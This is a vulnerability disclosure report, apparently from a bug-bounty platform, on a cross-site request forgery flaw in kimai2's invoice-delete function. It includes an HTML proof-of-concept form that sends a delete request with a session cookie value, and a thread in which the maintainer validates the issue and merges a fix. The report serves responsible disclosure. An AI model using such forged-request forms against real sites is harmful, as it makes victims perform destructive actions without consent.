Cross-Site Request Forgery (CSRF) in kevinpapst/kimai2

Valid

Reported on

Oct 16th 2021


Description

kevinpapst / kimai delete functionality is vulnerable to Cross site request forgery (csrf) attack

Proof of Concept

// PoC.js

1. login to admin account  https://www.kimai.org/demo/

2. goto invoice --> go down to preview invoices  --> click save all  it will redirect to this page -> https://demo-stable.kimai.org/en/invoice/show

3. click delete any invoice and capture the  request through burp interceptor

4. here burp id vulnerable to CSRF ATTACK 

<!DOCTYPE html>
<html>
 
<body>

    <form method="GET" action="https://demo-stable.kimai.org:443/en/invoice/delete/2">

        <input type="text" name="PHPSESSID" value="begjept58rut8ptt4r0sgc4asi">

        <input type="submit" value="Send">

    </form>

</body>

</html>



# Impact

In a successful CSRF attack, the attacker causes the victim user to carry out an action unintentionally. For example, this might be to change the email address on their account, to change their password, or to make a funds transfer
We have contacted a member of the kevinpapst/kimai2 team and are waiting to hear back a month ago
Asura-N modified their report
a month ago
Kevin Papst validated this vulnerability a month ago
Asura-N has been awarded the disclosure bounty
The fix bounty is now up for grabs
Kevin Papst
a month ago

Maintainer


@asura-n thanks for posting and sorry for the delay!

Asura-N
a month ago

Researcher


Thanks @kevin papst

Kevin Papst submitted a
a month ago
Kevin Papst confirmed that a fix has been merged on 1d32e4 a month ago
Kevin Papst has been awarded the fix bounty